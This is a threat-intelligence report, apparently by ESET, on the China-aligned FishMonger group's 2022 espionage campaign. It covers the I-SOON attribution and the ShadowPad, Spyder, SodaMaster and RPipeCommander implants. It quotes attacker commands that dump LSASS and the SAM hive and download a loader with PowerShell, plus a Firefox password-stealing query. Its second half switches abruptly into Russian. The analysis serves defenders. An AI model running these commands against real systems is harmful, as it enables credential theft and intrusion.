Operation FishMedley targeting governments, NGOs, and think tanks

On March 5^th, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I‑SOON for their involvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to the FishMonger APT group – I‑SOON’s operational arm – including the compromise of seven organizations that we identified as being targeted in a 2022 campaign that we named Operation FishMedley.

Key points of this blogpost:

• Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States.
• Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
• We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.
• Independent of the DOJ indictment, we determined that FishMonger is operated by I‑SOON.

FishMonger profile

FishMonger – a group believed to be operated by the Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity Report) – falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where I‑SOON’s office was located. FishMonger is also known as Earth Lusca, TAG‑22, Aquatic Panda, or Red Dev 10. We published an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic protests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution to FishMonger.

The group is known to operate watering-hole attacks, as reported by Trend Micro. FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.

Overview

On March 5^th, 2025, the US Department of Justice published a press release and unsealed an indictment against I‑SOON employees and officers of China’s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023. The FBI also added those named in the indictment to its “most wanted” list and published a poster, as seen in Figure 1.

The indictment describes several attacks that are strongly related to what we published in a private APT intelligence report in early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments, NGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the recently published indictment.

During 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this blogpost and have named that campaign Operation FishMedley.

FishMonger and I-SOON

During our research, we were able to independently determine that FishMonger is an espionage team operated by I‑SOON, a Chinese contractor based in Chengdu that suffered an infamous document leak in 2024 – see this comprehensive analysis from Harfang Labs.

Victimology

Table 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious interest to the Chinese government.

Table 1. Victimology details

Table 2 summarizes the implants used during each intrusion of Operation FishMedley.

Table 2. Details of the implants used against each victim

Technical analysis

Initial access

We were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged access inside the local network, such as domain administrator credentials.

At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials that allowed them to connect to the console.

At Victim F, the implants were delivered using Impacket, which means that the attackers somehow previously compromised a high-privilege domain account.

Lateral movement

At Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and installed implants.

Table 3 shows that the operators first did some manual reconnaissance using quser.exe, wmic.exe, and ipconfig.exe. Then they tried to get credentials and other secrets by dumping the local security authority subsystem service (LSASS) process (PID 944). The PID of the process was obtained via tasklist /svc and the dump was performed using comsvcs.dll, which is a known living-off-the-land binary (LOLBIN). Note that it is likely that the attackers executed quser.exe to see whether other users or admins were also logged in, meaning privileged accesses were present in LSASS. According to Microsoft documentation, to use this command the attacker must have Full Control permission or special access permission.

They also saved the registry hives sam.hive and system.hive, which can both contain secrets or credentials.

Finally, they tried to dump the LSASS process again, using a for loop iterating over the output from tasklist.exe. We have seen this same code used on other machines, so it is a good idea to block or at least alert on it.

Table 3. Commands executed via Impacket on a machine at Victim F

Timestamp (UTC)	Command
2022-06-21 07:34:07	quser
2022-06-21 14:41:23	wmic os get lastbootuptime
2022-06-21 14:41:23	ipconfig /all
2022-06-21 14:41:23	tasklist /svc
2022-06-21 14:41:23	C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c «C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full»
2022-06-21 14:41:23	reg save hklmsam C:userspublicmusicsam.hive
2022-06-21 14:41:23	reg save hklmsystem C:userspublicmusicsystem.hive
2022-06-21 14:41:23	net user
2022-06-22 07:05:37	tasklist /v
2022-06-22 07:07:33	dir c:users
2022-06-22 09:47:52	for /f «tokens=1,2 delims= » ^%A in (‘»tasklist /fi «Imagename eq lsass.exe» | find «lsass»»‘) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full

Toolset

ShadowPad

ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups, including FishMonger and SparklingGoblin, as documented by SentinelOne. In Operation FishMedley, the attackers used a ShadowPad version packed with ScatterBee.

At Victim D, the loader was downloaded using the following PowerShell command:

powershell (new-object System.Net.WebClient).DownloadFile(«http://<victim’s_web_server_IP_address>/Images/menu/log.dll»;»c:userspubliclog.dll»)

This shows that the attackers compromised a web server at the victim’s organization to use it as a staging server for their malware.

At Victim F, Firefox was used to download the loader, from http://5.188.230[.]47/log.dll. We don’t know whether attackers had interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the victim was redirected to the download page, say via a watering-hole attack.

log.dll is side-loaded by an old Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a file named log.dll.dat, which can be decrypted using the scripts provided in PwC’s GitHub repository.

We did not recover the log.dll.dat from the victim’s machine, but we found a fake Adobe Flash installer on VirusTotal with the identical log.dll file. The configuration of the ShadowPad payload is provided in Table 4.

Table 4. ShadowPad configuration

Note that from March 20^th, 2022 to November 2^nd, 2022, the C&C domain resolved to 213.59.118[.]124, which is mentioned in a VMware blogpost about ShadowPad.

Spyder

At Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in great detail by Dr.Web.

A Spyder loader was downloaded from http://<a_victim’s_web_server_IP_address>/Images/menu/aa.doc and dropped to C:UsersPublictask.exe around 18 hours after ShadowPad was installed.

The loader – see Figure 2; reads the file c:windowstempguid.dat and decrypts its contents using AES-CBC. The encryption key is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. The initialization vector (IV) is the first eight bytes of the key. Unfortunately, we were unable to recover the guid.dat file.

Then, the loader injects the decoded content – likely shellcode – into itself (task.exe process) as seen in Figure 3.

Despite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost identical to the Spyder variant documented by Dr.Web. The C&C server was hardcoded to 61.238.103[.]165.

Interestingly, multiple subdomains of junlper[.]com, a known Spyder C&C domain and a weak homoglyph domain to juniper.net, resolved to 61.238.103[.]165 in 2022.

A self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint 89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is a certificate used by FishMonger for its C&C servers.

SodaMaster

SodaMaster is a backdoor that was documented by Kaspersky in 2021. APT10 was the first group known to have access to this backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.

SodaMaster can only be found decrypted in memory and that’s where we detected it. Even though we did not recover the full loading chain, we have identified a few samples that are the first step of the chain.

SodaMaster loaders

We found six different malicious DLLs that are abusing legitimate executables via DLL side-loading. They all implement the same decryption and injection routine.

First, the loader reads a hardcoded file, for example debug.png, and XOR decrypts it using a hardcoded 239-byte key. Table 5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the table. Also note that we did not recover any of these encrypted payloads.

Table 5. SodaMaster loaders

Then, the decrypted buffer is injected into a newly created, suspended svchost.exe process – see Figure 4.

Finally, the shellcode is executed using either CreateRemoteThread (on Windows XP or older versions) or, on newer Windows versions, via NtCreateThreadEx as shown in Figure 5.

The last four loaders in Table 5 have additional features:

• They have an export named getAllAuthData that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins.
• The last three loaders persist as a service named Netlock, MsKeyboardFiltersrv, and downmap, respectively.

SodaMaster payload

As mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we’ve found don’t seem to have evolved much. They still implement the same four backdoor commands (d, f, l, and s) that were present in 2021.

Table 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different C&C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.

Table 6. SodaMaster configuration

Victim	C&C server	RSA key
B	162.33.178[.]23	MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
C	78.141.202[.]70	MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
F	192.46.223[.]211	MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE=
G	168.100.10[.]136	MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE=

RPipeCommander

At Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably loaded from disk or downloaded by Spyder. Because its DLL export name was rcmd64.dll, we named this implant RPipeCommander.

RPipeCommander is multithreaded and uses IoCompletionPort to manage the I/O requests of the multiple threads. It creates the named pipe \.PipeCmdPipe<PID>, where <PID> is the current process ID, and reads from and writes into this pipe.

RPipeCommander is a reverse shell that accepts three commands via the named pipe:

• h (0x68): создать процесс cmd.exe и привязать к нему пайпы для отправки команд и чтения вывода.
• i (0x69): записать команду в существующий процесс cmd.exe или прочитать вывод предыдущей команды.
• j (0x6A): завершить процесс cmd.exe, записав exitrn в командную строку.

Стоит отметить, что у нас есть только серверная часть RPipeCommander. Скорее всего, использовался второй компонент, клиент, для отправки команд серверу с другой машины в локальной сети.

Наконец, RPipeCommander написан на C++, и информация RTTI была включена в захваченные образцы, что позволило нам получить некоторые имена классов:

• CPipeServer
• CPipeBuffer
• CPipeSrvEvent
• CPipeServerEventHandler

Другие инструменты

Помимо основных имплантов, описанных выше, злоумышленники использовали несколько дополнительных инструментов для сбора или эксфильтрации данных, которые мы описываем в Таблице 7.

Таблица 7. Другие инструменты, использованные во время операции Operation FishMedley

Заключение

В этой статье мы показали, как FishMonger провел кампанию против высокопоставленных организаций по всему миру и был предметом обвинения Министерства юстиции США в марте 2025 года. Мы также показали, что группа не стесняется повторно использовать известные импланты, такие как ShadowPad или SodaMaster, даже спустя долгое время после их публичного описания. Наконец, мы независимо подтвердили, что FishMonger — это команда, входящая в китайскую компанию I‑SOON.

По любым вопросам, касающимся наших исследований, опубликованных на WeLiveSecurity, пожалуйста, свяжитесь с нами по адресу threatintel@eset.com.

ESET Research предлагает частные отчеты об APT-разведке и потоки данных. По любым вопросам, касающимся этой услуги, посетите страницу ESET Threat Intelligence.

IoCs

Полный список индикаторов компрометации (IoC) и образцов можно найти в нашем репозитории GitHub.

Файлы

Сеть

Техники MITRE ATT&CK

Эта таблица составлена с использованием версии 16 фреймворка MITRE ATT&CK.

Читать полный анализ на WeLiveSecurity →